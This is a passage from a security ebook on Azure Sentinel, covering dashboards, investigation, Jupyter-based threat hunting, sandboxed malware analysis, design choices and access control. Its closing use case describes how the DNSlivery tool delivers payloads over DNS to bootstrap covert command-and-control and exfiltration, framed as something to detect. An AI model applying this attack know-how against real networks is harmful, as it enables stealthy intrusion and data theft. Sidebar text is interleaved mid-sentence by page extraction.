For instance, Grafana built an App for Kubernetes. No need to figure out how to connect, what data to retrieve, and how to visualize: the App takes care of all of that. Just point it to your Kubernetes cluster and you’re good to go.

6.7 Let’s visualize Azure Sentinel data The scenario we’ll be visualizing is about potential mali- cious connections. Azure Sentinel not only stores IP address- es etcetera, but also the longitude and latitude for the con- nections which we’ll be using for our dashboard.

After you’ve set up Grafana, you need to add the Azure Monitor data source and configure a connection to your (Log Analytics workspace based) Azure Sentinel environment. After this, add a community World Map plugin. Create a new dashboard, add the World Map panel, and open up the configuration of that panel. Select ‘Azure Log Analytics’ as the service, select your Workspace (the name of your Azure Sentinel environment) and past in the KQL query. 47

The result, a world map showing potential malicious connec- tions and their geo location.

6.8 What about my other data? As discussed earlier in this article, Grafana can also be used to visualize ITOps data such as availability and perfor- mance management. Marc van Eijk, Senior Program Manager on the Azure team, also used Grafana to build an Azure Stack Uptime Monitor.

Want to geo visualize the people pounding on your SSH port in real-time? No problem. Want to see your DNS analytics? There is a Grafana plugin for that. 6.9 What key indicators will you be reporting on? Simon Persin makes a great point:

“The challenge for any organization when defining key risk indicators (KRIs) for cyber security is that it is different for every enterprise. 48 There is no blueprint to use as guidance; no one KRI that is pervasive or generic across all businesses, or even industry sectors, because the variances of what needs to be considered are diverse.”

Every business needs to understand for itself which type of attacks or risks could affect it most significantly. Only once those risks are identified can a potential detection strategy be put in place to highlight whether the risk is starting to occur. Even then, the way in which an attack could occur will also depend on the structure and setup of the company itself.

One helpful resource in this regard is MITRE’s ATT&CK frame- work. 49

7. Investigation. 7. Investigation.

50

Separating the wheat from the chaff in cybersecurity is hard. Often you find yourself handling enormous volumes of events. And more than not, data quality is an issue. False positives often lead to triage fatigue.

Being able to do triage quickly is important. The time window to respond when under attack is short, advanced adversaries typically only need hours to gain access, elevate privileges and exfiltrate data.

Azure Sentinel has an Investigation feature. Let’s look at the difference between investigating and hunting and look at how exactly Azure Sentinel can help in your SOC with both.

7.1 How does a SOC typically operate? Before we dive into Azure Sentinel’s new investigation features, let’s rewind and first look at how a Security Opera- tions Center (SOC) operates. Most SOC’s will have two critical functions: (1) setting up and maintaining security monitoring and related tooling. And (2) find suspicious or malicious activity by analyzing alerts. 51

For the latter, typically a SOC will have a 3-tier model. Tier 1 is where security analysts do the triaging; they review the latest alerts to determine relevancy and urgency. Alerts that signal an incident will be forwarded to Tier 2 analysts.

The second tier reviews those cases and uses threat intel- ligence (IOC’s, etc.) to identify affected systems and the scope of the attack. Tier 3 are often the most experience people on the team, mostly referred to as Threat Hunters. They explore the environment to identify stealthy threats and conduct continuous vulnerability tests.

In most SOC’s the Tier 2 folks will do the investigations, and Tier 3 folks will do the hunting. And while there is no clear line, most people refer to the term Investigation when they are following up with a (by Tier 1 forwarded) case.

7.2 Investigation UI in Azure Sentinel Microsoft has an investigation experience in Azure Sentinel. Before, you would find an investigation UI in Azure Security Center, but as Azure Sentinel is becoming the central place to aggregate security the investigations will likely happen from there, and therefore Microsoft is deprecating the inves- tigation UI in ASC. To get to the new Investigation Experience in Azure Sentinel you will need navigate to an Incident. For every Incident you’ll find two buttons: View Full Details and Investigate.

The investigation experience window has three sections: the 52 top will show the Case name, and other Case details. On the right you’ll find four buttons: Timeline, Info, Entities and Help. The main window will show all the entities related to this Inci- dent in a graph style manner.

Clicking an entity will show the details, hovering over the entity will give you some quick actions, for instance these: Related Alerts, Hosts the Account Failed on, Hosts which the Account Logged On to.

Clicking these will show these results as extra entities in your graph, expanding on your search. There is also the opportu- nity to dive into the raw results, pivoting from the graph to a KQL query window.

The timeline button on the right allows you to ‘bookmark’ items results during your investigation and have them readily available as information on this ‘notebook’.

7.3 Entity mapping is important! When you’re creating Alert Rules in Azure Sentinel, that will then trigger Incidents when the criteria is met, you have the option to do Entity Mapping. From the underlying KQL query, you can pick any field and map it into either ‘Account’, 53 ‘Host’ or ‘IP addresses.

This allows Azure Sentinel to recognize that data as such and provide the right Quick Investigation items, and more impor- tantly link data/Incidents together. More entities are coming soon, but for now these three are available: Account, Host and IP Address.

7.4 OK, so what about hunting and supporting Tier 3 SOC analysts? In a previous chapter I wrote about cloud-native threat hunting with Jupyter and Azure Notebooks. I talked about how you could take the ‘Kqlmagic’ extension that Microsoft wrote, and use KQL queries in Jupyter notebooks to hunt for malicious actors.

Something I did not mention in that blog is the built-in support for Hunting that Azure Sentinel has. Microsoft provides you with pre-compiled KQL queries to find known indicators in your environment. These are available in the Hunting node under the Threat Management section and are mapped back to the Tactics of the MITRE ATT&CK framework. You can add your own favorite Hunting to the workspace as well. Directly from this section of Azure Sentinel you can run the query by using the Run Query button.

When running the query, you can expand (one of) the results and use the [..] button to access the Bookmark function. This saves results and allows you to relate them to an ongo- ing campaign by using the Tags field. You’ll find these Saved Queries in the Hunting section of Azure Sentinel under the Bookmarks tab. 54

55

8. Threat hunting in the cloud. 8. Threat hunting

in the cloud. 56

Robert M. Lee, CEO of Dragos Inc. has a great quote:

“Threat hunting exists where automation ends”. Threat hunting is large manually, performed by SOC analysts, trying to find a ‘needle in the haystack’. And in the case of cyber­security, that haystack is a pile of ‘signals’.

8.1 Kusto (KQL) Kusto Query Language or KQL in short is the default way to work with data in Azure Data Explorer powered services such as Log Analytics, Azure Security Center, Azure Monitor and many more. It is a powerful yet easy to learn language.

Robert Cain, a Microsoft MVP, has written a 4-hour long course on Pluralsight that you can take for free, to learn the language all the way up to the advanced queries. KQL skills is something you’ll need if you will be doing threat hunting in Azure; most of the security data will be in Log Analytics workspaces.

8.2 Jupyter Jupyter Notebook, formerly called IPython, is an open- source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text through markdown. It is already broadly 57 used in data science, and has support for lots of program- ming languages such as R, Python, etc. The multi-user version of Jupyter is called JupyterHub.

The cool thing is that you can share your notebook with others, and that you can produce interactive output using HTML etc. and display that through a so called “presentation mode”. This makes it great for threat hunting and sharing signals within the SOC team.

On GitHub you’ll find ready-to-run Docker images containing Jupyter.

8.3 Azure Notebooks Azure Notebooks is currently in public preview and is a free hosted service to develop and run Jupyter notebooks in the cloud with no installation. Azure Notebooks is a free service, but each project is limited to 4GB memory and 1GB data to prevent abuse. Legitimate users that exceed these limits see a Captcha challenge to continue running note- books.

However, if the Azure Active Directory PRO TIP account you sign in with is associated with an You need to deploy the Azure subscription, you can connect to any Ubuntu version of the Azure Data Science Virtual Machine (DSVM) DSVM. The Windows instances within that subscription. DSVM’s can version of DSVM does 58 be found in the Azure Marketplace. With these not contain JupyterHub dedicated DSVM’s you can add better pro- by default. The Ubuntu cessing power and remove any of those limits. template of DSVM has an extra bonus: it will In the case of Azure Notebooks, it allows you open up the right ports to share your notebooks using GitHub. by default in your NSG!

8.4 Pandas, KQLMagic and other libraries One of the things you will find out early using Jupyter is that you will want to manipulate data. This is where a library called Pandas comes in. Pandas is an open source Python framework, maintained by the PyData community and mostly used for Data Analysis and Processing.

Another library you will need is KQLMagic. Michael Binshtock, who works at Microsoft, wrote this and allows you to directly query Log Analytics-based workspaces in Azure, for instance when working with data in Azure Monitor, Azure Security Center, etcetera.

The great thing about this library is that it uses the Kusto Query Language (KQL). Which means that you can use your favorite KQL queries directly in Jupyter.

8,5 Real-world threat hunting Let’s look at a real-world example. In this case we have a number of virtual machines running in Microsoft Azure, and Azure Security Center is turned on at the subscription level to capture relevant security events.

We’re suspicious of a machine called APPSERVER, based on an Alert we got, and want to do some investigation. ° We go to Azure Notebooks and login ° We create a new Project called ‘Threat Hunting’ ° We create a new Notebook called ‘Azure threat hunting’ ° We will use the Free Compute option and open the note- 59 book

The docker image that the Free Compute option provides already contains the Kqlmagic library that we will need. If you’re using a dedicated DSVM, or are running Jupyter locally, you should run the install command to get the library installed:

!pip install Kqlmagic — no-cache-dir — upgrade%reload_ext Kqlmagic

° Through the terminal window you can is- sue commands such as ‘ps’ or ‘top’ PRO TIP The Free Compute is ° Now we will need to authenticate to the a docker container in Log Analytics workspace we will be us- a shared compute ing. In this case we will be connecting to environment and there- Azure Security Center: fore it will take a couple %kql loganalytics:// of minutes before the tenant=’’ library loads. You can ;clientid=’’ look ‘behind the scenes’ ;clientsecret=’’ by using the Terminal ;workspace=’’ button: ;alias=’

° We can now run KQL queries to look at the data being captures by Azure Security Center for this machine. In this case we’ll have a look at the network connections it has: %kql VMConnection | where Computer == ‘APPSERVER’ ° If you want to go multi-line to make PRO TIP things better readable, you need to use While in the KQL que- double %. As our application server is in ry interface in Azure The Netherlands, I will apply a filter and you’ll be using the dou- 60 only show the connections that are going ble quote character for to IP addresses that our outside of our specifying input, you’ll country: be using the single %%kqlVMConnection| where Computer quote in Jupyter. Make == ‘APPSERVER’| where Direction sure to change your == ‘outbound’| where RemoteCoun- queries so that they try != ‘Netherlands’connections = work properly in Jupyter. _.to_dataframe()

° Let’s see if any of these IP addresses match a TOR node. There is a current list of TOR nodes and their IP address- es at https://www.dan.me.uk/torlist. We can load that into our notebook using Pandas: import pandas as pdtorlist = pd.read_ csv(‘https://www.dan.me.uk/torlist’,head- er=0,names=[“DestinationIp”])

° The next step is to compare the two lists to see if there are any matches: connections.merge(torlist, on=”Destination- Ip”)

° Another great way of visualizing your data is taking the Longitude and Latitude points from the KQL query and putting them on a world map. Add the following line to your KQL query: | distinct RemoteLongitude, RemoteLatitude| project RemoteLongitude, RemoteLatitude

From this point on you’ll likely want to do some more inves- tigation and assess whether or not there is a real threat. Use your own hunting skills for that ;-) 61

8.6 Sharing your findings A unique feature of Jupyter is the Presentation mode. It allows you to easily share key items from your audience to other people in a visual friendly way, without having to copy paste data to another application.

You can use Markdown text to annotate your notebook. Enable the Slide picker by going to the View menu, Cell Toolbar, then Slide Show. Go to any row and on the right-hand side select to Skip it, be part of a Slide, etcetera.

Lastly, click on ‘Enter/Exit RISE Slideshow’ to share your findings:

8.7 Jupyter: for threat hunting with Azure Sentinel Jupyter is a great platform for threat hunting. You can work with data in-context and natively connect to security backends in Microsoft Azure using Kqlmagic. 62 Best of all, using Azure Notebooks and Azure Security Center, we didn’t spend a dollar and got our threat hunting platform for free. Start learning KQL, Python and Jupyter today and supercharge your hunting skills!

63

9. Malware analysis. 9. Malware analysis.

64

Did you go threat hunting and think you found a piece of malware? Windows 1903 and newer include a new operating system feature called Windows Sandbox. Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation, making it ideal for malware analysis.

Windows Sandbox is built on the same technologies that power Windows Containers making it more suitable to run on laptops without requiring the full power of Windows Server and or a full VM.

9.1 Windows Sandbox At its core Windows Sandbox is a lightweight virtual machine, so it needs an operating system image to boot from. One of the key enhancements Microsoft made for Windows Sandbox is the ability to use a copy of the Windows 10 installed on your computer, instead of downloading a new VHD image as you would have to do with an ordinary virtual machine.

Sandbox always presents a clean environment, but the challenge is that some operating system files can change. Microsoft’s solution is to construct what they refer to as “dynamic base image”: an operating system image that has clean copies of files that can change, but links to files that cannot change that are in the Windows image that already exists on the host. The majority of the files are links (immu­ table files) and that’s why the small size (100MB) for a full op- erating system. Microsoft calls this instance the “base image” for Windows Sandbox, using Windows Container parlance.

65

Windows Sandbox uses Microsoft’s hypervisor. It is essential- ly running another copy of Windows which needs to be boot- ed and this can take some time. So rather than paying the full cost of booting the sandbox operating system every time you start Windows Sandbox, Microsoft uses two other technologies; “snapshot” and “clone.” PRO TIP Snapshot allows to boot the sandbox environ- Windows Sandbox is ment once and preserve the memory, CPU, and also aware of the host’s device state to disk. Then it can restore the battery state, which sandbox environment from disk and put it in allows it to optimize the memory rather than booting it, when you power consumption. This need a new instance of Windows Sandbox. is great for using it on This significantly improves the start time of laptops. Windows Sandbox.

9.2 Enabling Sandbox in Windows Windows Sandbox is built-in starting with build 1903 of Windows. You need to have either the Pro or Enterprise edition to enable it. Here are the high level steps to enable the feature:

° Open Settings, go to Add or Remove Windows Features ° Select Windows Sandbox ° Restart ° Windows Sandbox will be in your Start Menu

PRO TIP 66 If you are using a virtual machine, enable nested virtualization with this PowerShell cmdlet: As a minimum your device requires the AMD64 Set-VMProcessor architecture, virtualization capabilities en- -VMName abled in BIOS, at least 4GB of RAM, at least -ExposeVirtual- 1 GB of free disk space and at least 2 CPU izationExtensions cores. $true

9.3 Customizing your Sandbox environment It is possible to customize certain aspects of your Win- dows Sandbox environment. For instance, automatically launch a script at startup, map certain folders from the host into the Sandbox, etc. Currently these four aspects can be customized:

° Enable or disable the virtualized GPU. ° Enable or disable networking in the sandbox. ° Share folders from the host. ° Run a startup script or program.

To achieve this, Windows Sandbox uses so called Sandbox Config files. These have a file extension of .WSB are XML- based. Here’s an example:

Disable Disable C:\Users\MaartenGoet\ Downloads true explorer.exe C:\users\WDAG­ 67 UtilityAccount\Desktop\Downloads

Disabling or enabling the GPU and or network PRO TIP is straightforward as you can see in the ex- Note that folders are ample. For Shared Folders you need to specify always mapped under a folder that you want to share with the host the path C:\Users\ system, e.g. C:\MALWARE, and whether you WDAGUtilityAccount\ want it to be read-only or support write oper- Desktop in your ations as well. Setting TRUE in the ReadOnly Windows Sandbox. value makes it read-only, and FALSE enables read and write support.

path to the host folder value

For the Command at Logon you may specify a file name and path or a script. The command EXPLORER.EXE would work, as would reference to a script, for instance: C:\Users\WDA- GUtilityAccount\Desktop\MappedFolder\start.cmd.

The command

Save the file as SOMETHING.WSB and launch it whenever you want to run the Sandbox with this configuration. 9.4 Analyzing Malware in Windows Sandbox How do we get our malware samples in PRO TIP Windows Sandbox? While you can’t drag and You can find the drop files onto Windows Sandbox, the operat- Sysinternals tools ing system actually allows you to copy & paste ready for use at 68 files into it. And as we saw above, you could http://live.sysinternals. also use a mapped folder to achieve this. And com if you’ve enabled networking, you could also use regular applications such as Microsoft Edge to download files from any of your favorite malware analysis sites.

To copy your findings back to your host machine, you could use the mapped Host Folder (enable it for Read Write) or just Copy & Paste it back from the Sandbox window to your host. Or just use OneNote online from your browser.

69

10. Design Consider­­a­ tions. 10. Design

Considerations. 70

Microsoft provides Azure Sentinel as-a-service, which you can enable with the click of a button, only paying for the storage you use. However, Azure Sentinel, as with any cloud services and or SIEM, still needs some design considerations if you are putting it into production. What are these consid- erations? And what are the options available to me and my company?

10.1 Let’s look at the foundation first Before we start, let’s revisit some of the key concepts and understand the fundamentals. Azure Sentinel uses a Log Analytics workspace as its backend, storing events and other information. Log Analytics workspaces are the same technology as Azure Data Explorer uses for its storage. These backends are ultra-scalable, and you can get back results in seconds using the Kusto Query Language (KQL).

The first thing to plan for is the Log Analytics workspace we’ll be using. When setting up Azure Sentinel for the first time, it allows you to create a new Log Analytics workspace or to pick an existing one. DESIGN CONSIDERATION: New or existing Log Analytics workspace?

71

Let’s look at why would you want to re-use an existing work- space. Of course, it would be the easy way; it is already there, you’ve set up the right access to it, data is already stream- ing in and you can just add Azure Sentinel to it. No problem, right?

Well, access control is particularly one of the bigger reasons to potentially create a new Log Analytics workspace. That allows you to tightly control who has access to that aggregated data in Azure Sentinel, which often is a CISO requirement as we’ll be discussing next.

Apart from access control reasons, you might also run into a technical challenge that forces you to create a new work- space; it is relatively hard to move an existing Log Analytics environment over to another subscription. You need to first offboard agents, remove current Solutions, before you can move it. And that might cause ‘downtime’ for the monitoring solution currently using that workspace.

And of course, the last reason would be that sometimes you’ve created a bit of history in your current environment; experimented with settings, have a name for your workspace that you’d like to change etcetera, so you might want to start with a ‘clean slate’ because of that. DESIGN CONSIDERATION: How long do we need to store our data?

72

One other thing to consider is how long you will want to store the data. The default setting will be 31 days. However, you can change this workspace setting and extend to up to two years. As per the documentation:

“The retention period of collected data stored in the database depends on the selected pricing plan. By default, collected data is available for 31 days by default, but can be extended to 730 days. Data is stored encrypted at rest in Azure storage, to ensure data confidentiality, and the data is replicated within the local region using locally redundant storage (LRS). The last two weeks of data are also stored in SSD-based cache and this cache is encrypted.”

10.2 No, Azure Sentinel will NOT replace Azure Security Center An often-heard remark is: “Oh, so Azure Sentinel will replace Azure Security Center.” No, no no. Azure Security Center has its own place in the security landscape. It acts as the primary ‘engine’ to perform detections on Microsoft Azure, in your VM’s, in containers and on other properties such as Azure Stack, your on-premises infrastructure, etcetera.

Want to detect crypto miners in your Linux VM on Azure? Enable Azure Security Center. Want to get best practices 73 and insights on securing your network in Azure? Enable Azure Security Center.

However, if you want to coordinate your security operations centrally, and aggregate multiple security solutions, such as Azure Security Center, Microsoft’s Cloud App Security, Azure ATP and others, you will want to enable Azure Sentinel.

By connecting all these data sources, you can start building a single pane of glass, and have one point of entry for your responders when they need to go threat hunting.

DESIGN CONSIDERATION: Which other security solutions will I be enabling alongside Azure Sentinel?

10.3 The identity and access piece is important As pointed out before, often the CISO office will require you to tightly control who has access to that aggregated data in Azure Sentinel, because it could contain personal identifiable (PII) data. Normally only appointed security 74 officers will be granted ‘read access’.

DESIGN CONSIDERATION: Who needs access to the data in Azure Sentinel? Can we provide that access ‘just in time’ to these people & roles?

Microsoft added RBAC features to Log Analytics workspaces as Oleg Ananiev, the group program manager for both Azure Monitor and Log Analytics, announced recently. This will then implicitly work for Azure Sentinel.

As people come and go in a company, security offers will also likely be changing over time. We don’t want to grant access to a specific person but to the role he or she is fulfilling. We also don’t want to grant access all the time, but only when needed; for instance, when hunting for threats, or when a specific case was raised, and an investigation is opened.

This is where Azure Active Directory (AAD) Privileged Identity Management (PIM) can help. You will need either Azure AD P2 licenses or EMS E5 licenses for those users you would like to use with Azure AD PIM. 10.4 Plan for the data connections Azure Sentinel has a lot of possible data sources. Each and everyone of those needs a data connection and poten- tially a configuration. 75

DESIGN CONSIDERATION: Which data sources will I be connecting? What configuration does that data connection need?

I won’t be writing up each configuration of each possible data source. But I will provide you with a few ones that you need to think about, because there are things to know on how you can connect them:

° Office 365: You can have only one connection going back to your Office 365 tenant. Some of you may already be using the Office 365 ‘solution’ that was part of Microsoft’s Operations Management Suite (OMS) to ‘monitor’ security. You need to disconnect that one, to be able to connect that Office 365 tenant to Azure Sentinel.

° Azure Security Center: If you have multiple subscriptions in your tenant, some or all containing Azure Security Center instances: no problem. However, Azure Sentinel will only be able to aggregate information from and connect to instances in the tenant that it is residing in.

° Network appliances: Most of the dashboards that Azure Sentinel provides for network vendors, such as Palo Alto, Check Point, Fortinet, F5 and Barracuda, rely in the data to be ingested as syslog messages. This will require you set up a Linux-based VM that has the Microsoft Monitoring Agent installed. That machine will receive the syslog messages and bring it to the Log Analytics work- space natively.

76

10.5 How should I connect other SIEM systems? Some enterprises will already have some sort of SIEM solution, like for instance ArcSight. And while I am NOT advocating that this is the preferred way of setting up cloud governance, your CISO office might want to hook up Azure Sentinel to that current system.

DESIGN CONSIDERATION: Will I be connecting Azure Sentinel to another SIEM solution?

If that is a requirement, you will want to consider using Azure Monitor and Event Hubs to forward your alerts to this other system. By using Event Hubs, you can do this safely and reli- ably; even when the receiving end is offline or malfunctioning, 77 events get stored in the queue and Azure will release them when the system is back online.

If your system is not supported by Azure Monitor or Event Hubs, there still a fair chance to get it integrated with Azure Sentinel. There is a growing list of third parties that have built their own integrations on top of the API, that you can use.

10.6 How can we support the threat hunters? Up until now, we’ve talked about getting data into Azure Sentinel. But after it gets processed and an alert gets raised, you will want to investigate. Your threat hunting colleagues need access to the data to understand what is going on.

DESIGN CONSIDERATION: What technology will the threat hunting colleagues be using? Do they prefer Jupyter? Will they require KQL access to the workspace?

One of the ways to do threat hunting is using the Kusto Query Language (KQL) and search through events quickly and easily in the workspace. They could use Azure Data Explorer, the ‘Logs’ function of the Log Analytics workspace, a third-party application (such as Grafana) or the native Azure Sentinel UI in the Microsoft Azure portal. That last option, going threat hunting from the Azure Senti- nel portal UI, is a neat option. Microsoft provides you out of the box with pre-fab hunting queries and maps them back to the right Tactics category (fi: Initial Access, Lateral Move- 78 ment, etcetera). Either way, consider what you would to do to provide them with the right UI, and access rights.

Another popular option among threat hunters is Jupyter. Mi- crosoft has a free service based on Jupyter notebooks called Azure Notebooks. Through the ‘Kqlmagic’ extension, you can use Python to directly query the workspace using KQL que- ries. You can read about it in another chapter. Consider if they will be using Jupyter locally (fi: in a docker container) or if they’ll use Azure Notebooks. Also consider where you will be storing the notebooks; GitHub is a great option for that. And remember, Microsoft already provides you with many sample notebooks to get you jumpstarted.

10.7 Dashboards: how will we visualize the Azure Sentinel data? Azure Sentinel provides a lot of out-of-the-box dashboards. Some of them are solution focused (Office 365), some are technically focused (Insecure Protocols) and some are geared towards third parties (F5, Palo Alto, etcetera).

Technically, these are JSON files that work in the Azure Dashboards section of your portal. You import them into your Tenant, and they will be available for everyone who can access that Tenant. Of course, you can restrict this with the built-in Azure access controls as they are just resources like any other.

Microsoft regularly updates it (GitHub) repository with new versions of the dashboards as they receive feedback from the field. You can manually update the JSON file in your Tenant or use the built-in functions in the Azure Sentinel UI. Either way, you should plan for some change management around this. DESIGN CONSIDERATION: What are my requirements for visualizing Azure Sentinel data? How do I provide access to those programs and or operators? 79 Another popular choice to visualize data from Azure Sentinel is to use open source visualization tools. Grafana is a great option, because it has a large ‘store’ with visualization types (most of them free), and because Microsoft provides you with a native Log Analytics connector for Grafana.

With that connector, you can use Kusto (KQL) queries to get specific data from Azure Sentinel and map it onto one of Grafana’s visualizations. For instance, a world map with net- work connections, or a list of Alerts. Grafana has dashboard- ing features that most SOC’s will love, for instance the rotat- ing dashboards. You will of course need to plan access from Grafana to Azure Sentinel’s data.

10.8 Escalation and notifications All the above are technical design considerations. However, if Azure Sentinel will be powering your Security Operations Center (SOC), you will need to design your processes as well. How will your Alerts be followed up? Do we need a connection to our ticketing system? What if alerts & tickets stay open for too long? Are the right people, and potentially the management, informed in time (before breaching the SLA)? 80

DESIGN CONSIDERATION: What process do I need to run my Security Operations Center (SOC)? Which tools will support my Service Levels?

One of the options available to you out-of-the-box to auto- mate the follow-up of alerts are Playbooks. In essence, these are Azure Logic Apps that can be triggered whenever a cer- tain condition is met. For instance, an Alert with a high sever- ity gets raised by Azure Sentinel, and you want to send this to a security engineer via text message. The logic app could contain code that connects to Twilio and sends the Alert de- scription to a specified phone number. You can read about it in another chapter.

How do I know the security engineer has read it? What if he or she didn’t, and we need to escalate to the next engineer. Or worse yet, we’re approaching SLA times and we need to start informing management. This is where 3rd party solutions like SIGNL4 come in.

There are a few out there, but SIGNL4 is great because it is a cloud service where you can set escalation paths, do two-way communication (to receive acknowledgement), use multiple channels (ersistent push, text and voice) and log the audit trail. They also support duty scheduling and have a 2-tier escalation model.

81

10.9 Key takeaway The key takeaway is that while Azure Sentinel is software-as-service, you should still plan for the implemen- tation of the service. Gather your business and CISO requirements and consider for each subject what you should do. Also, don’t forget that it is not only a technical deploy- ment, but you will need to plan for the process side as well. 82

11. Access and authorization. 11. Access and

authorization. 83

Let’s assume you’ve successfully deployed Azure Sentinel and are collecting data and using it for monitoring and hunt- ing purposes. Quickly after, your company’s privacy offer or auditor points out that both the law (for instance: GDPR & AVG) and the company’s requirements don’t allow all admins to have access all the time to all of that personal identifiable data.

You need to come up with a solution to design access to Azure Sentinel in a way that the SecOps people can work with the alerts, the SIEM admins can create or modify rules, and that hunters can sift through all the data to find what they are looking for. How should you do that? In this chapter I’ll share some considerations.

11.1 Azure Log Analytics Azure Sentinel uses a Log Analytics PRO TIP workspace to store its data. Recently, Want to quickly know Microsoft introduced a more granular if your Log Analytics role-based access module for Log Analytics. workspace is enabled 84 Previously, we only had the workspace- for resource-context context access mode, but now we also have access mode? Run this a resource-context access mode. For each Powershell command: Log Analytics workspace you can chose the desired access mode. Get-AzResource -ResourceType Resource-context access mode allows you to Microsoft.Oper- set permissions all the way down to individu- ationalInsights/ al tables in the Log Analytics workspace, aka workspaces Table Level RBAC. -ExpandProperties | foreach {$_.Name You can change the current workspace access + “: “ + $_.Prop- control mode from the Properties page erties.features. of the workspace, which can be found under enableLogAccessUsin- the Workspace settings node in the Azure gOnlyResourcePermis- Sentinel UI. (Changing the setting will be sions} disabled if you don’t have permissions to configure the workspace)

PRO TIP Want to enabled resource-context permissions for all your workspaces? Run this script:

Get-AzResource -ResourceType Microsoft.OperationalInsights/ workspaces -ExpandProperties | foreach {if ($_.Properties. features.enableLogAccessUsingOnlyResourcePermissions -eq $null){ $_.Properties.features | Add-Member enableLogAcces- sUsingOnlyResourcePermissions $true -Force }else{ $_.Proper- ties.features.enableLogAccessUsingOnlyResourcePermissions = $true }Set-AzResource -ResourceId $_.ResourceId -Properties $_.Properties -Force 11.2 Azure Active Directory Because Azure Sentinel uses Log Analytics as the back- end, part of the Azure platform, it therefore also uses Azure Active Directory for its identities. Azure has two built-in user roles for Log Analytics workspaces: Log Analytics Reader and 85 Log Analytics Contributor.

Members of the Log Analytics Reader role can:

° View and search all monitoring data ° View monitoring settings, including viewing the configuration of Azure diagnostics on all Azure resources.

Members of the Log Analytics Contributor role can:

° Read all monitoring data as Log Analytics Reader can ° Create and configure Automation accounts ° Add and remove solutions ° Read storage account keys ° Configure collection of logs from Azure Storage ° Edit monitoring settings for Azure resources

These roles can be given to uses at different scopes:

° Subscription — Access to all workspaces in the subscription ° Resource Group — Access to all workspace in the resource group ° Resource — Access to only the specified workspace

11.3 Custom roles If the built-in roles don’t meet the specific needs of your enterprise, you can create your own custom roles. Just like built-in roles, you can assign custom roles to users, groups, and service principals at subscription, resource group, and resource scopes.

You implement table access control with Azure PRO TIP custom roles to either grant or deny access to Custom roles are stored specific tables in the workspace. These roles in an Azure Active are applied to workspaces with either work- Directory (Azure AD) space-context or resource-context access con- directory and can be 86 trol modes regardless of the user’s access mode. shared across subscrip- tions. Each directory Create a custom role with the following ac- can have up to 5000 tions to define access to table access control. custom roles. (For specialized clouds, such ° To grant access to a table, include it in as Azure Government, the Actions section of the role definition. Azure Germany, and ° To deny access to a table, include it in the Azure China 21Vianet, NotActions section of the role definition. the limit is 2000 ° Use * to specify all tables. custom roles.)

For example, to create a SecOps role for inves- tigations with access only to the SecurityAlert and AzureActivity tables, create a custom role as follows:

{ “Name”: “SecOps investigator”, “Id”: “88888888–8888–8888–8888–888888888888”, “IsCustom”: true, “Description”: “Can access security alerts and query the azure activities for a user.”, “Actions”: [ “Microsoft.OperationalInsights/workspaces/query/ SecurityAlerts/read”, “Microsoft.OperationalInsights/workspaces/query/ AzureActivity/read” ], “NotActions”: [], “DataActions”: [], “NotDataActions”: [], “AssignableScopes”: [ “/subscriptions/{subscriptionId1}”, “/subscriptions/{subscriptionId2}” ] } 11.4 Custom Logs You can’t currently grant or deny access to individual custom logs, but you can grant or deny access to all custom logs. To create a role with access to all custom logs, create a custom role using the following actions: 87

“Actions”: [“Microsoft.OperationalInsights/ workspaces/query/Tables.Custom/read”],

11.5 Key takeaways ° If a user is granted global read permission with the standard Reader or Contributor roles that include the read action, it will override the per-table access control and give them access to all log data. ° If a user is granted per-table access but no other permissions, they would be able to access log data from the API but not from the Azure portal. To provide access from the Azure portal, take the actions from Log Analytics Reader role into your custom role. ° Administrators of the subscription will have access to all data types regardless of any other permission settings.

PRO TIP ° Workspace owners are treated like any Unsure who has what other user for per-table access control. access? Use the ‘Access ° You should assign roles to security groups control IAM’ node from instead of individual users to reduce the the Advanced Settings 88 number of assignments. This will also help pane of your Log you use existing group management tools Analytics workspace to to configure and verify access find out.

11.6 Privileged Identity Management Azure AD Privileged Identity Management (PIM) enables you to set up IAM in a way that users and accounts don’t carry the required roles and permissions all the time.

Accounts are ahead of time enabled to request a certain role. Once they want to use that role, just in time they put in a request to use that role and for how long and, depending on the configuration PRO TIP in PIM, that request can then be evaluated Azure AD PIM is a and granted or denied. The great thing is that premium feature in Azure AD PIM also works for custom roles. Azure. You need either a Azure AD P2 license And example would be where a Threat Hunt- for the user that needs er would use a regular Azure AD account and PIM functionality, or then go to the PIM interface to request the license it through an SecOps investigator role to access all the re- EMS E5 or Microsoft 365 quired information in Azure Sentinel for his or E5 license. her investigation.

11.7 Monitoring PIM usage Most enterprises and auditors will also require you to monitor that role usage. This can be easily done using the Azure AD audit logs. Make sure you enable the Azure Active Directory connector in Azure Sentinel so that the data type ‘AuditLogs’ is collected. The PIM operations are stored in the AuditLogs table. You need to filter on the category for ‘ResourceManagement’ and operationname containing ‘PIM’. Here’s a base KQL query for hunting: 89 AuditLogs| where Category == “ResourceManage- ment”and OperationName contains “PIM”

You could use a similar query to create a rule to alert the SOC when that role is being used. 90

12. Putting it all together. 12. Putting it all

together. 91

Now that we’ve discussed all elements of Azure Sentinel, it’s time to put it all together and build some Use Cases. In this chapter you’ll find three use cases.

12.1 Use Case 1: Detect DNS tunneling No matter how tightly you control your network, you probably allow DNS queries and UDP 53 traffic on your network.

Bad actors can abuse this to establish a stealthy command & control (C2) channel and or exfiltrate data using DNS tunneling.

Azure Sentinel can help detect these types of attacks, and provide insights in the various stages of the kill chain of this attacker.

12.1.1 Delivering a payload over DNS On GitHub you can find a project called DNSlivery that aims to deliver payloads over DNS. It is a lightweight solution built on Python and the Scapy library. No need for a full-fledged DNS server, DNSlivery will listen on UDP 53 and serve the payload through TXT records.

92 12.1.2 Use DNSlivery to bootstrap DNS tunnelling How is DNSlivery different from for instance PowerDNS? With DNSlivery there is no need for a client on the target, you can just use native PowerShell in the operating system. However, this does mean that it is one-way communication. But because it will not touch on disk, it can help bootstrap the next phase of your attack, DNS tunneling:

“Even though more complete DNS tunneling tools already exist (fi: dnscat2 and iodine), they all require to run a dedicated client on the target. The problem is that there is probably no other way then DNS to deliver the client in such restricted environments. In other words, building a DNS communication channel with these tools require to already have a DNS communication channel.

In comparison, DNSlivery only provides one-way communication from your server to the target but does not require any dedicated client to do so. Thus, if you need to build a reliable two-way communication channel over DNS, use DNSlivery to deliver the client of a more ad- vanced DNS tunneling tool to your target.”

12.1.3 Setting up the DNS server You will of course need a domain name and be able to change and administer the NS records. Point the NS record(s) to the external IP of the machine you’ll be using for this.

